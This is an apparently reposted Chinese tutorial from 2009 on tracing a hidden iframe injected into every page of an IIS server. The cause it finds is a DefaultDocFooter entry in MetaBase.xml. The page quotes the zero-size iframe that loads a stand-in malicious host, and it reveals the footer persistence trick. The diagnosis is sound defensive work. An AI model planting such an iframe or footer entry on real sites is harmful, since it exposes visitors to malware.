Windows服务器下查IIS被挂iframe木马
作者:佚名 来源:网页教学网 发布时间:2009-03-02 17:32:00
一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒
打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码
分析原因
首先怀疑ARP挂马,用防ARP的工具又没有发现有arp欺骗
而且arp欺骗一般不会每次都 * 入代码,而是时有时无
而且使用http://127.0.0.1 或者http://localhost 访问的时候也可以找到这段代码
arp欺骗的可能排除。
然后就想到可能是JS被篡改,或者是其它的包含文件,查找后没有发现被改的页面 连新建的HTML页面浏览的时候也会 * 入这段代码,那就只能是通过IIS挂上去的了。
备份iis数据然后重装iis,代码消失,将备份的iis恢复,问题又来了。
仔细寻找,问题应该出在IIS的配置文件上,打开配置文件,没有发现那段代码。
那很有可能是调用了某个文件,这个怎么查啊,忽然想起了大名鼎鼎的Filemon
本地载了一个上传到服务器上,打开Filemon,数据太多了,过滤掉一些没有用的
只留下iis的进程,数据还是很多,看来服务器上的站点还是挺多人在访问的。
关掉所有站点,建了一个测试站点anky 目录为D:\www\ 在下面建了一个空白页面test.htm
访问一下这个页面代码 * 进来了,再看一下Filemon 奇怪怎么读取C:\Inetpub\wwwroot\iisstart.htm
打开C:\Inetpub\wwwroot\iisstart.htm一看,里面就躺着
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
把代码删除了留空,访问test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm删除了再访问
test.htm 出现 “读取数据页脚文件出错”问题就出这里了,看来是调用了
这个文件。
把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,这样怎么行,解决问题当然要连根拔掉。
continue
有没有可能是扩展造成的,到扩展中检查了一遍全部都是正常的
当然 通过ISAPI 挂马的也是存在的
左想右想最后还是觉得配置文件有问题
打开配置文件,配置文件在%windir%\system32\inetsrv\MetaBase.xml
用记事本打开,查找iisstart.htm 找到一行,开始以为是默认站点,后来一想不对啊
默认站点都删除了,再仔细一看这句代码为
DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"
删除掉这一行,问题彻底解决了。
猜你喜欢
- 成功的网站意味着您的企业能够从互联网上获得更多客户,迅速扩大企业知名度,创造更多生意机会。如果您依旧认为网站就是放在互联网上的产品手册,那它
- 在此介绍一下我在RedHat Linux 7.2下装Apache与Tomcat4整合的过程,重点讲述mod_webapp.so的制作方法,
- 现在的个人站长依靠Google广告,收入明显地比过去两年减少,从而不少站长都转向做英文站,以获得高额收入,对于新朋友来说,做英文站可不像脑中
- 10月29日消息,华硕电脑与NVIDIA、交大合作开发出全球最快、体积最小的单机超级电脑,抢攻企业用户伺服器市场,华硕伺服器部门也成立专属团
- 启用并配置文件服务Windows Server 2003的管理工具中有一项功能叫做“管理您的服务器”,启动该工具之后,可以看到当前服务器上启
- 很多人想优化自己的FreeBSD,特别是在网络性能以及内核调整上,因为这些是最直接的优化方式。在这里我收集整理并用中文注释了一下,相信很多人
- DoS 攻击、DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Denial of Service的简写就是拒绝服务,而DDoS
- 了解网赚的老手,都应该知道,网赚其实是一种思路。遍观现在的网赚项目,网赚教程,遍地飞,其实都是思路的延伸,生发出来的。说什么日赚100,日赚
- SpamAssassin的打分标准见http://spamassassin.org/tests.html,默认的标准可能并不适合我们,比如S
- 上周美图秀秀刚发布了闪图DIY功能,就有用户反映制作的闪图效果非常好,不过有个小瑕疵,就是图片帧数不能删除。所以这周美图秀秀团队再次对闪图功
- 你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址,但是打开的并不是你想要去的网站。它可能是114的查询页面,可能是一个广告页面,更
- 从真正接触网络到做个人站长,也就几年的事情,得出一个结论,做站长很辛苦。也许一个站长少了很多与别人谈笑的时间,却多了许多面对电脑独自思考的理
- 白帽SEO工作准确的讲白帽SEO是一些遵守互联网道德准则,遵守搜索引擎约束规范的搜索引擎优化工作者。白帽SEO是相对黑帽SEO而言的。其特点
- 今天介绍下Godaddy主机用户应该如何压缩文件。随着托管账户内容的增加,压缩及archive文档的能力对简化账户维护及文档储存大有裨益。另
- 关于分区一个潜在的黑客如果要攻击你的Linux服务器,他首先就会尝试缓冲区溢出。在过去的几年中,以缓冲区溢出为类型的安全漏洞是最为常见的一种
- 众所周知,服务器是计算机网络中最重要的资源,对其安全要求很高。如果我们正在运行的服务器没有进行正确的谨慎配置,就可能将大量的有用信息泄漏出去
- 如果你关注过nginx,必定知道nginx这个软件有什么用的,如果你的网站访问量越来越高,一台服务器已经没有办法承受流量压力,那就增多几台服
- 有Godaddy用户问怎样续费和取消电子邮件账户,可以用Account Manager里的Manage Email页面来为电子邮件按帐户续费
- 外链是搜索优化的一件重磅武器,增加外链主要包括交换链接,论坛推广,博客推广三种,其他的像花钱买广告,挂马找肉鸡,一个是要花钱,一个要技术,其
- 1、传统缓存之一(404)这个办法是把nginx的404错误定向到后端,然后用proxy_store把后端返回的页面保存。配置:locati